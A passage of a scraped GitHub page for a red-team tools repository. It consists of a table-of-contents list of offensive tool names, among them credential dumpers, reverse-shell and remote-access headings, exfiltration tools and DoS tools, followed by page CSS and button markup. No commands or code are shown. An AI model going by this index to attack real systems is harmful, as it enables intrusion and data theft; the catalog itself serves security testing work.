Ripper"},{"level":3,"text":"🔙SCOMDecrypt","anchor":"scomdecrypt","htmlText":"🔙SCOMDecrypt"},{"level":3,"text":"🔙nanodump","anchor":"nanodump","htmlText":"🔙nanodump"},{"level":3,"text":"🔙eviltree","anchor":"eviltree","htmlText":"🔙eviltree"},{"level":3,"text":"🔙SeeYouCM-Thief","anchor":"seeyoucm-thief","htmlText":"🔙SeeYouCM-Thief"},{"level":3,"text":"🔙MailSniper","anchor":"mailsniper","htmlText":"🔙MailSniper"},{"level":3,"text":"🔙SharpChromium","anchor":"sharpchromium","htmlText":"🔙SharpChromium"},{"level":3,"text":"🔙dploot","anchor":"dploot","htmlText":"🔙dploot"},{"level":1,"text":"Discovery","anchor":"discovery","htmlText":"Discovery"},{"level":3,"text":"🔙PCredz","anchor":"pcredz","htmlText":"🔙PCredz"},{"level":3,"text":"🔙PingCastle","anchor":"pingcastle","htmlText":"🔙PingCastle"},{"level":3,"text":"🔙Seatbelt","anchor":"seatbelt","htmlText":"🔙Seatbelt"},{"level":3,"text":"🔙ADRecon","anchor":"adrecon","htmlText":"🔙ADRecon"},{"level":3,"text":"🔙adidnsdump","anchor":"adidnsdump","htmlText":"🔙adidnsdump"},{"level":3,"text":"🔙kerbrute","anchor":"kerbrute","htmlText":"🔙kerbrute"},{"level":3,"text":"🔙scavenger","anchor":"scavenger","htmlText":"🔙scavenger"},{"level":1,"text":"Lateral Movement","anchor":"lateral-movement","htmlText":"Lateral Movement"},{"level":3,"text":"🔙crackmapexec","anchor":"crackmapexec","htmlText":"🔙crackmapexec"},{"level":3,"text":"🔙WMIOps","anchor":"wmiops","htmlText":"🔙WMIOps"},{"level":3,"text":"🔙PowerLessShell","anchor":"powerlessshell","htmlText":"🔙PowerLessShell"},{"level":3,"text":"🔙PsExec","anchor":"psexec","htmlText":"🔙PsExec"},{"level":3,"text":"🔙LiquidSnake","anchor":"liquidsnake","htmlText":"🔙LiquidSnake"},{"level":3,"text":"🔙Enabling RDP","anchor":"enabling-rdp","htmlText":"🔙Enabling RDP"},{"level":3,"text":"🔙Upgrading shell to meterpreter","anchor":"upgrading-shell-to-meterpreter","htmlText":"🔙Upgrading shell to meterpreter"},{"level":3,"text":"🔙Forwarding Ports","anchor":"forwarding-ports","htmlText":"🔙Forwarding Ports"},{"level":3,"text":"🔙Jenkins reverse shell","anchor":"jenkins-reverse-shell","htmlText":"🔙Jenkins reverse shell"},{"level":3,"text":"🔙ADFSpoof","anchor":"adfspoof","htmlText":"🔙ADFSpoof"},{"level":3,"text":"🔙Coercer","anchor":"coercer","htmlText":"🔙Coercer"},{"level":1,"text":"Collection","anchor":"collection","htmlText":"Collection"},{"level":3,"text":"🔙BloodHound","anchor":"bloodhound","htmlText":"🔙BloodHound"},{"level":3,"text":"🔙Snaffler","anchor":"snaffler","htmlText":"🔙Snaffler"},{"level":3,"text":"🔙linWinPwn","anchor":"linwinpwn","htmlText":"🔙linWinPwn"},{"level":1,"text":"Command and Control","anchor":"command-and-control","htmlText":"Command and Control"},{"level":3,"text":"🔙Living Off Trusted Sites Project","anchor":"living-off-trusted-sites-project","htmlText":"🔙Living Off Trusted Sites Project"},{"level":3,"text":"🔙Havoc","anchor":"havoc","htmlText":"🔙Havoc"},{"level":3,"text":"🔙Covenant","anchor":"covenant","htmlText":"🔙Covenant"},{"level":3,"text":"🔙Merlin","anchor":"merlin","htmlText":"🔙Merlin"},{"level":3,"text":"🔙Metasploit Framework","anchor":"metasploit-framework","htmlText":"🔙Metasploit Framework"},{"level":3,"text":"🔙Pupy","anchor":"pupy","htmlText":"🔙Pupy"},{"level":3,"text":"🔙Brute Ratel","anchor":"brute-ratel","htmlText":"🔙Brute Ratel"},{"level":3,"text":"🔙NimPlant","anchor":"nimplant","htmlText":"🔙NimPlant"},{"level":3,"text":"🔙Hoaxshell","anchor":"hoaxshell","htmlText":"🔙Hoaxshell"},{"level":1,"text":"Exfiltration","anchor":"exfiltration","htmlText":"Exfiltration"},{"level":3,"text":"🔙Dnscat2","anchor":"dnscat2","htmlText":"🔙Dnscat2"},{"level":3,"text":"🔙Cloakify","anchor":"cloakify","htmlText":"🔙Cloakify"},{"level":3,"text":"🔙PyExfil","anchor":"pyexfil","htmlText":"🔙PyExfil"},{"level":4,"text":"HTTP Cookies","anchor":"http-cookies","htmlText":"HTTP Cookies"},{"level":4,"text":"ICMP Echo 8","anchor":"icmp-echo-8","htmlText":"ICMP Echo 8"},{"level":4,"text":"NTP Request","anchor":"ntp-request","htmlText":"NTP Request"},{"level":3,"text":"🔙Powershell RAT","anchor":"powershell-rat","htmlText":"🔙Powershell RAT"},{"level":4,"text":"Setup","anchor":"setup","htmlText":"Setup"},{"level":3,"text":"🔙GD-Thief","anchor":"gd-thief","htmlText":"🔙GD-Thief"},{"level":1,"text":"Impact","anchor":"impact","htmlText":"Impact"},{"level":3,"text":"🔙Conti Pentester Guide Leak","anchor":"conti-pentester-guide-leak","htmlText":"🔙Conti Pentester Guide Leak"},{"level":3,"text":"🔙SlowLoris","anchor":"slowloris","htmlText":"🔙SlowLoris"},{"level":3,"text":"🔙usbkill","anchor":"usbkill","htmlText":"🔙usbkill"},{"level":3,"text":"🔙Keytap","anchor":"keytap","htmlText":"🔙Keytap"}],"siteNavLoginPath":"/login?return_to=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools"}}],"overviewFilesProcessingTime":0}},"appPayload":{"helpUrl":"https://docs.github.com","findFileWorkerPath":"/assets-cdn/worker/find-file-worker-7d7eb7c71814.js","findInFileWorkerPath":"/assets-cdn/worker/find-in-file-worker-96e76d5fdb2c.js","githubDevUrl":null,"enabled_features":{"copilot_workspace":null,"code_nav_ui_events":false,"overview_shared_code_dropdown_button":false,"react_blob_overlay":false,"accessible_code_button":true,"github_models_repo_integration":false}}}}</script> <div data-target="react-partial.reactRoot"><style data-styled="true" data-styled-version="5.3.11">.iVEunk{margin-top:16px;margin-bottom:16px;}/*!sc*/ .jzuOtQ{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;}/*!sc*/ .bGojzy{margin-bottom:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;row-gap:16px;}/*!sc*/ .iNSVHo{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;padding-bottom:16px;padding-top:8px;}/*!sc*/ .bVgnfw{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:8px;}/*!sc*/ @media screen and (max-width:320px){.bVgnfw{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}}/*!sc*/ .CEgMp{position:relative;}/*!sc*/ @media screen and (max-width:380px){.CEgMp .ref-selector-button-text-container{max-width:80px;}}/*!sc*/ @media screen and (max-width:320px){.CEgMp{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}.CEgMp .overview-ref-selector{width:100%;}.CEgMp .overview-ref-selector > span{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start;}.CEgMp .overview-ref-selector > span > span[data-component="text"]{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}}/*!sc*/ .gMOVLe[data-size="medium"]{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;min-width:0;}/*!sc*/ .gMOVLe[data-size="medium"] svg{color:var(--fgColor-muted,var(--color-fg-muted,#656d76));}/*!sc*/ .gMOVLe[data-size="medium"] > span{width:inherit;}/*!sc*/ .gUkoLg{-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;}/*!sc*/ .bZBlpz{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;}/*!sc*/ .lhTYNA{margin-right:4px;color:var(--fgColor-muted,var(--color-fg-muted,#656d76));}/*!sc*/ .ffLUq{font-size:14px;min-width:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}/*!sc*/ .bmcJak{min-width:0;}/*!sc*/ .fLXEGX{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}/*!sc*/ @media screen and (max-width:1079px){.fLXEGX{display:none;}}/*!sc*/ .lmSMZJ[data-size="medium"]{color:var(--fgColor-muted,var(--color-fg-muted,#656d76));padding-left:4px;padding-right:4px;}/*!sc*/ .lmSMZJ[data-size="medium"] span[data-component="leadingVisual"]{margin-right:4px !important;}/*!sc*/ .dqfxud{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}/*!sc*/ @media screen and (min-width:1080px){.dqfxud{display:none;}}/*!sc*/ @media screen and (max-width:543px){.dqfxud{display:none;}}/*!sc*/ .fGwBZA[data-size="medium"][data-no-visuals]{color:var(--fgColor-muted,var(--color-fg-muted,#656d76));}/*!sc*/ .jxTzTd{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;padding-left:8px;gap:8px;}/*!sc*/ .gqqBXN{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;gap:8px;}/*!sc*/ @media screen and (max-width:543px){.gqqBXN{display:none;}}/*!sc*/ .dzXgxt{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}/*!sc*/ @media screen and (max-width:1011px){.dzXgxt{display:none;}}/*!sc*/ .iWFGlI{margin-left:8px;margin-right:8px;margin:0;}/*!sc*/ .vcvyP{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;min-width:160px;}/*!sc*/ .YUPas{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}/*!sc*/ @media screen and (min-width:1012px){.YUPas{display:none;}}/*!sc*/ .izFOf{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}/*!sc*/ @media screen and (min-width:544px){.izFOf{display:none;}}/*!sc*/ .vIPPs{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;gap:16px;}/*!sc*/ .fdROMU{width:100%;border-collapse:separate;border-spacing:0;border:1px solid;border-color:var(--borderColor-default,var(--color-border-default,#d0d7de));border-radius:6px;table-layout:fixed;overflow:unset;}/*!sc*/ .jGKpsv{height:0px;line-height:0px;}/*!sc*/ .jGKpsv tr{height:0px;font-size:0px;}/*!sc*/ .jdgHnn{padding:16px;color:var(--fgColor-muted,var(--color-fg-muted,#656d76));font-size:12px;text-align:left;height:40px;}/*!sc*/ .jdgHnn th{padding-left:16px;background-color:var(--bgColor-muted,var(--color-canvas-subtle,#f6f8fa));}/*!sc*/ .bQivRW{width:100%;border-top-left-radius:6px;}/*!sc*/ @media screen and (min-width:544px){.bQivRW{display:none;}}/*!sc*/ .ldkMIO{width:40%;border-top-left-radius:6px;}/*!sc*/ @media screen and (max-width:543px){.ldkMIO{display:none;}}/*!sc*/ .jMbWeI{text-align:right;padding-right:16px;width:136px;border-top-right-radius:6px;}/*!sc*/ .gpqjiB{color:var(--fgColor-muted,var(--color-fg-muted,#656d76));font-size:12px;height:40px;}/*!sc*/ .dzCJzi{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;gap:8px;min-width:273px;padding:8px;}/*!sc*/ @media screen and (min-width:544px){.dzCJzi{-webkit-flex-wrap:nowrap;-ms-flex-wrap:nowrap;flex-wrap:nowrap;}}/*!sc*/ .eNCcrz{text-align:center;vertical-align:center;height:40px;border-top:1px solid;border-color:var(--borderColor-default,var(--color-border-default,#d0d7de));}/*!sc*/ .bHTcCe{border-top:1px solid var(--borderColor-default,var(--color-border-default));cursor:pointer;}/*!sc*/ .csrIcr{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;gap:16px;}/*!sc*/ .bUQNHB{border:1px solid;border-color:var(--borderColor-default,var(--color-border-default,#d0d7de));border-radius:6px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}/*!sc*/ @media screen and (max-width:543px){.bUQNHB{margin-left:-16px;margin-right:-16px;max-width:calc(100% + 32px);}}/*!sc*/ @media screen and (min-width:544px){.bUQNHB{max-width:100%;}}/*!sc*/ .jPdcfu{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;border-bottom:1px solid;border-bottom-color:var(--borderColor-default,var(--color-border-default,#d0d7de));-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding-right:8px;position:-webkit-sticky;position:sticky;top:0;background-color:var(--bgColor-default,var(--color-canvas-default,#ffffff));z-index:1;border-top-left-radius:6px;border-top-right-radius:6px;}/*!sc*/ .iphEWz{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;border-bottom:none;max-width:100%;padding-left:8px;padding-right:8px;}/*!sc*/ .hUCRAk{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;}/*!sc*/ .cwoBXV[data-size="medium"]{color:var(--fgColor-muted,var(--color-fg-subtle,#6e7781));padding-left:8px;padding-right:8px;}/*!sc*/ .QkQOb{padding:32px;overflow:auto;}/*!sc*/ data-styled.g1[id="Box-sc-g0xbh4-0"]{content:"iVEunk,jzuOtQ,bGojzy,iNSVHo,bVgnfw,CEgMp,gMOVLe,gUkoLg,bZBlpz,lhTYNA,ffLUq,bmcJak,fLXEGX,lmSMZJ,dqfxud,fGwBZA,jxTzTd,gqqBXN,dzXgxt,iWFGlI,vcvyP,YUPas,izFOf,vIPPs,fdROMU,jGKpsv,jdgHnn,bQivRW,ldkMIO,jMbWeI,gpqjiB,dzCJzi,eNCcrz,bHTcCe,csrIcr,bUQNHB,jPdcfu,iphEWz,hUCRAk,cwoBXV,QkQOb,"}/*!sc*/ .brGdpi{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;-webkit-clip:rect(0,0,0,0);clip:rect(0,0,0,0);white-space:nowrap;border-width:0;}/*!sc*/ data-styled.g6[id="_VisuallyHidden__VisuallyHidden-sc-11jhm7a-0"]{content:"brGdpi,"}/*!sc*/ .hWlpPn{position:relative;display:inline-block;}/*!sc*/ .hWlpPn::after{position:absolute;z-index:1000000;display:none;padding:0.5em 0.75em;font:normal normal 11px/1.5 -apple-system,BlinkMacSystemFont,"Segoe UI","Noto Sans",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";-webkit-font-smoothing:subpixel-antialiased;color:var(--tooltip-fgColor,var(--fgColor-onEmphasis,var(--color-fg-on-emphasis,#ffffff)));text-align:center;-webkit-text-decoration:none;text-decoration:none;text-shadow:none;text-transform:none;-webkit-letter-spacing:normal;-moz-letter-spacing:normal;-ms-letter-spacing:normal;letter-spacing:normal;word-wrap:break-word;white-space:pre;pointer-events:none;content:attr(aria-label);background:var(--tooltip-bgColor,var(--bgColor-emphasis,var(--color-neutral-emphasis-plus,#24292f)));border-radius:6px;opacity:0;}/*!sc*/ @-webkit-keyframes tooltip-appear{from{opacity:0;}to{opacity:1;}}/*!sc*/ @keyframes tooltip-appear{from{opacity:0;}to{opacity:1;}}/*!sc*/ .hWlpPn:hover::after,.hWlpPn:active::after,.hWlpPn:focus::after,.hWlpPn:focus-within::after{display:inline-block;-webkit-text-decoration:none;text-decoration:none;-webkit-animation-name:tooltip-appear;animation-name:tooltip-appear;-webkit-animation-duration:0.1s;animation-duration:0.1s;-webkit-animation-fill-mode:forwards;animation-fill-mode:forwards;-webkit-animation-timing-function:ease-in;animation-timing-function:ease-in;-webkit-animation-delay:0s;animation-delay:0s;}/*!sc*/ .hWlpPn.tooltipped-no-delay:hover::after,.hWlpPn.tooltipped-no-delay:active::after,.hWlpPn.tooltipped-no-delay:focus::after,.hWlpPn.tooltipped-no-delay:focus-within::after{-webkit-animation-delay:0s;animation-delay:0s;}/*!sc*/ .hWlpPn.tooltipped-multiline:hover::after,.hWlpPn.tooltipped-multiline:active::after,.hWlpPn.tooltipped-multiline:focus::after,.hWlpPn.tooltipped-multiline:focus-within::after{display:table-cell;}/*!sc*/ .hWlpPn.tooltipped-s::after,.hWlpPn.tooltipped-se::after,.hWlpPn.tooltipped-sw::after{top:100%;right:50%;margin-top:6px;}/*!sc*/ .hWlpPn.tooltipped-se::after{right:auto;left:50%;margin-left:-16px;}/*!sc*/ .hWlpPn.tooltipped-sw::after{margin-right:-16px;}/*!sc*/ .hWlpPn.tooltipped-n::after,.hWlpPn.tooltipped-ne::after,.hWlpPn.tooltipped-nw::after{right:50%;bottom:100%;margin-bottom:6px;}/*!sc*/ .hWlpPn.tooltipped-ne::after{right:auto;left:50%;margin-left:-16px;}/*!sc*/ .hWlpPn.tooltipped-nw::after{margin-right:-16px;}/*!sc*/ .hWlpPn.tooltipped-s::after,.hWlpPn.tooltipped-n::after{-webkit-transform:translateX(50%);-ms-transform:translateX(50%);transform:translateX(50%);}/*!sc*/ .hWlpPn.tooltipped-w::after{right:100%;bottom:50%;margin-right:6px;-webkit-transform:translateY(50%);-ms-transform:translateY(50%);transform:translateY(50%);}/*!sc*/ .hWlpPn.tooltipped-e::after{bottom:50%;left:100%;margin-left:6px;-webkit-transform:translateY(50%);-ms-transform:translateY(50%);transform:translateY(50%);}/*!sc*/ .hWlpPn.tooltipped-multiline::after{width:-webkit-max-content;width:-moz-max-content;width:max-content;max-width:250px;word-wrap:break-word;white-space:pre-line;border-collapse:separate;}/*!sc*/ .hWlpPn.tooltipped-multiline.tooltipped-s::after,.hWlpPn.tooltipped-multiline.tooltipped-n::after{right:auto;left:50%;-webkit-transform:translateX(-50%);-ms-transform:translateX(-50%);transform:translateX(-50%);}/*!sc*/ .hWlpPn.tooltipped-multiline.tooltipped-w::after,.hWlpPn.tooltipped-multiline.tooltipped-e::after{right:100%;}/*!sc*/ .hWlpPn.tooltipped-align-right-2::after{right:0;margin-right:0;}/*!sc*/ .hWlpPn.tooltipped-align-left-2::after{left:0;margin-left:0;}/*!sc*/ data-styled.g17[id="Tooltip__TooltipBase-sc-17tf59c-0"]{content:"hWlpPn,"}/*!sc*/ .liVpTx{display:inline-block;overflow:hidden;text-overflow:ellipsis;vertical-align:top;white-space:nowrap;max-width:125px;}/*!sc*/ data-styled.g19[id="Truncate__StyledTruncate-sc-23o1d2-0"]{content:"liVpTx,"}/*!sc*/ </style> <!-- --> <!-- --> <div class="Box-sc-g0xbh4-0 iVEunk"><div class="Box-sc-g0xbh4-0 jzuOtQ"><div class="Box-sc-g0xbh4-0 bGojzy"></div></div><div class="Box-sc-g0xbh4-0 iNSVHo"><div class="Box-sc-g0xbh4-0 bVgnfw"><div class="Box-sc-g0xbh4-0 CEgMp"><button type="button" aria-haspopup="true" aria-expanded="false" tabindex="0" aria-label="main branch" data-testid="anchor-button" class="Box-sc-g0xbh4-0 gMOVLe prc-Button-ButtonBase-c50BI overview-ref-selector width-full" data-loading="false" data-size="medium" data-variant="default" aria-describedby="branch-picker-repos-header-ref-selector-loading-announcement" id="branch-picker-repos-header-ref-selector"><span data-component="buttonContent" class="Box-sc-g0xbh4-0 gUkoLg prc-Button-ButtonContent-HKbr-"><span data-component="text" class="prc-Button-Label-pTQ3x"><div class="Box-sc-g0xbh4-0 bZBlpz"><div class="Box-sc-g0xbh4-0 lhTYNA"><svg aria-hidden="true" focusable="false" class="octicon octicon-git-branch" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg></div><div class="Box-sc-g0xbh4-0 ffLUq ref-selector-button-text-container"><span class="Box-sc-g0xbh4-0 bmcJak prc-Text-Text-0ima0"> <!-- -->main</span></div></div></span><span data-component="trailingVisual" class="prc-Button-Visual-2epfX prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-triangle-down" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></span></span></button><button hidden="" data-hotkey-scope="read-only-cursor-text-area"></button></div><div class="Box-sc-g0xbh4-0 fLXEGX"><a style="--button-color:fg.muted" type="button" href="/A-poc/RedTeam-Tools/branches" class="Box-sc-g0xbh4-0 lmSMZJ prc-Button-ButtonBase-c50BI" data-loading="false" data-size="medium" data-variant="invisible" aria-describedby=":Rclab:-loading-announcement"><span data-component="buttonContent" class="Box-sc-g0xbh4-0 gUkoLg prc-Button-ButtonContent-HKbr-"><span data-component="leadingVisual" class="prc-Button-Visual-2epfX prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-git-branch" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg></span><span data-component="text" class="prc-Button-Label-pTQ3x">Branches</span></span></a><a style="--button-color:fg.muted" type="button" href="/A-poc/RedTeam-Tools/tags" class="Box-sc-g0xbh4-0 lmSMZJ prc-Button-ButtonBase-c50BI" data-loading="false" data-size="medium" data-variant="invisible" aria-describedby=":Rklab:-loading-announcement"><span data-component="buttonContent" class="Box-sc-g0xbh4-0 gUkoLg prc-Button-ButtonContent-HKbr-"><span data-component="leadingVisual" class="prc-Button-Visual-2epfX prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-tag" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M1 7.775V2.75C1 1.784 1.784 1 2.75 1h5.025c.464 0 .91.184 1.238.513l6.25 6.25a1.75 1.75 0 0 1 0 2.474l-5.026 5.026a1.75 1.75 0 0 1-2.474 0l-6.25-6.25A1.752 1.752 0 0 1 1 7.775Zm1.5 0c0 .066.026.13.073.177l6.25 6.25a.25.25 0 0 0 .354 0l5.025-5.025a.25.25 0 0 0 0-.354l-6.25-6.25a.25.25 0 0 0-.177-.073H2.75a.25.25 0 0 0-.25.25ZM6 5a1 1 0 1 1 0 2 1 1 0 0 1 0-2Z"></path></svg></span><span data-component="text" class="prc-Button-Label-pTQ3x">Tags</span></span></a></div><div class="Box-sc-g0xbh4-0 dqfxud"><a style="--button-color:fg.muted" type="button" aria-label="Go to Branches page" href="/A-poc/RedTeam-Tools/branches" class="Box-sc-g0xbh4-0 fGwBZA prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":Relab:-loading-announcement"><svg aria-hidden="true" focusable="false" class="octicon octicon-git-branch" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg></a><a style="--button-color:fg.muted" type="button" aria-label="Go to Tags page" href="/A-poc/RedTeam-Tools/tags" class="Box-sc-g0xbh4-0 fGwBZA prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":Rmlab:-loading-announcement"><svg aria-hidden="true" focusable="false" class="octicon octicon-tag" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M1 7.775V2.75C1 1.784 1.784 1 2.75 1h5.025c.464 0 .91.184 1.238.513l6.25 6.25a1.75 1.75 0 0 1 0 2.474l-5.026 5.026a1.75 1.75 0 0 1-2.474 0l-6.25-6.25A1.752 1.752 0 0 1 1 7.775Zm1.5 0c0 .066.026.13.073.177l6.25 6.25a.25.25 0 0 0 .354 0l5.025-5.025a.25.25 0 0 0 0-.354l-6.25-6.25a.25.25 0 0 0-.177-.073H2.75a.25.25 0 0 0-.25.25ZM6 5a1 1 0 1 1 0 2 1 1 0 0 1 0-2Z"></path></svg></a></div></div><div class="Box-sc-g0xbh4-0 jxTzTd"><div class="Box-sc-g0xbh4-0 gqqBXN"><div class="Box-sc-g0xbh4-0 dzXgxt"><!--$--><div class="Box-sc-g0xbh4-0 iWFGlI"><span class="Box-sc-g0xbh4-0 vcvyP TextInput-wrapper prc-components-TextInputWrapper-i1ofR prc-components-TextInputBaseWrapper-ueK9q" data-leading-visual="true" data-trailing-visual="true" aria-busy="false"><span class="TextInput-icon" id=":R2j5ab:" aria-hidden="true"><svg aria-hidden="true" focusable="false" class="octicon octicon-search" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg></span><input type="text" aria-label="Go to file" role="combobox" aria-controls="file-results-list" aria-expanded="false" aria-haspopup="dialog" autoCorrect="off" spellcheck="false" placeholder="Go to file" aria-describedby=":R2j5ab: :R2j5abH1:" data-component="input" class="prc-components-Input-Ic-y8" value=""/><span class="TextInput-icon" id=":R2j5abH1:" aria-hidden="true"></span></span></div><!--/$--></div><div class="Box-sc-g0xbh4-0 YUPas"><button type="button" class="prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="default" aria-describedby=":Rr5ab:-loading-announcement"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="text" class="prc-Button-Label-pTQ3x">Go to file</span></span></button></div><div class="react-directory-add-file-icon"></div><div class="react-directory-remove-file-icon"></div></div><button type="button" aria-haspopup="true" aria-expanded="false" tabindex="0" class="prc-Button-ButtonBase-c50BI" data-loading="false" data-size="medium" data-variant="primary" aria-describedby=":R55ab:-loading-announcement" id=":R55ab:"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="leadingVisual" class="prc-Button-Visual-2epfX prc-Button-VisualWrap-Db-eB"><svg aria-hidden="true" focusable="false" class="octicon octicon-code hide-sm" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg></span><span data-component="text" class="prc-Button-Label-pTQ3x">Code</span><span data-component="trailingVisual" class="prc-Button-Visual-2epfX 